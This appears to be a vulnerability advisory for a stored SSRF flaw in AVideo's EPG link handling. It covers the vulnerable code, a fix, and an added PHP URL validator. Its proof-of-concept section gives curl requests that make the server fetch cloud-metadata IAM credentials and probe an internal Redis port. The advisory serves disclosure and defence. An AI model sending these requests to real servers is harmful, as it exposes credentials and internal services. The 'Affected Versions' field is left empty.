## Vulnerability Overview

- **Vulnerability Name**: Stored SSRF via Video EPG Link Missing isSSRSafeURL() Validation
- **CVE ID**: CVE-2024-34740
- **Severity**: 6.5/10 (Medium)
- **Weakness**: CWE-918 (Server-Side Request Forgery)

The AVideo platform's EPG (Electronic Program Guide) link feature contains a stored SSRF vulnerability. Authenticated users with upload permissions can store arbitrary URLs, which the server fetches on every EPG page visit. URLs are validated only with PHP's `FILTER_VALIDATE_URL`, which accepts URLs pointing at internal addresses (e.g., `http://127.0.0.1`, `http://169.254.169.254`). Although the codebase contains an `isSSRSafeURL()` function designed to prevent SSRF, it is not invoked in the EPG link processing flow.

---

## Impact Scope

- **Affected Versions**:

## Fix

```php
if (!isSSRSafeURL($url)) {
    throw new \RuntimeException('URL blocked by SSRF protection');
}
```

Reuse the existing SSRF protection function already applied to other code paths.

---

## Vulnerable Code Locations

**EPG Link Storage** (`objects/videoAddNew.json.php:119`):

```php
$obj->setEpg_link($_POST['epg_link']);
```

**EPG Data Parsing** (`objects/EpgParser.php:355`):

```php
$this->content = @file_get_contents($this->url);
```

---

## POC Code

### 1. Targeting Cloud Metadata Service

```bash
curl -b "PHPSESSID=USER_SESSION" \
  -X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \
  -d "title=TestVideo&epg_link=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
```

### 2. Triggering EPG Parser

```bash
curl -b "PHPSESSID=USER_SESSION" \
  "https://your-avideo-instance.com/plugin/Live/view/Live_schedule/?video_id=VIDEO_ID"
```

### 3. Scanning Internal Ports

```bash
# Scan an internal service
curl -b "PHPSESSID=USER_SESSION" \
  -X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \
  -d "title=TestVideo&epg_link=http://127.0.0.1:6379"
```
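To make concrete what `FILTER_VALIDATE_URL` does and does not check, here is an added example of a stricter EPG link validator. It is not AVideo's code and not the implementation of `isSSRSafeURL()`; the names `epgLinkIsSafe()` and `ipIsPublic()` are hypothetical.

```php
<?php
// Added example, not AVideo's code: a stricter EPG link check. The names
// epgLinkIsSafe() and ipIsPublic() are hypothetical.

function ipIsPublic(string $ip): bool
{
    // NO_PRIV_RANGE rejects RFC 1918 and fc00::/7; NO_RES_RANGE rejects
    // loopback, 0.0.0.0/8, fe80::/10 and 169.254.0.0/16 (cloud metadata).
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function epgLinkIsSafe(string $url): bool
{
    // The check the vulnerable path already does: syntax only, nothing about
    // where the URL points. http://127.0.0.1:6379 passes it.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $parts = parse_url($url);
    // Restrict the scheme: file:// and others also pass FILTER_VALIDATE_URL.
    if (!isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = trim($parts['host'], '[]'); // parse_url keeps IPv6 brackets
    // A literal IP must be public.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return ipIsPublic($host);
    }
    // A hostname must resolve only to public addresses (covers "localhost"
    // and DNS names that point at internal hosts).
    $records = @dns_get_record($host, DNS_A | DNS_AAAA);
    if (empty($records)) {
        return false;
    }
    foreach ($records as $r) {
        if (!ipIsPublic($r['ip'] ?? $r['ipv6'] ?? '')) {
            return false;
        }
    }
    return true;
}

// Constructed sample inputs; all of them pass FILTER_VALIDATE_URL.
foreach (['http://169.254.169.254/latest/meta-data/', 'http://127.0.0.1:6379',
          'http://[::1]/', 'file:///etc/passwd', 'https://example.com/epg.xml'] as $u) {
    printf("%-45s %s\n", $u, epgLinkIsSafe($u) ? 'allowed' : 'blocked');
}
```

Because this is a stored SSRF, the check belongs in the fetch path in `EpgParser.php` as well as at storage time, and resolving the name only at validation time leaves a DNS-rebinding window before the later `file_get_contents()` fetch.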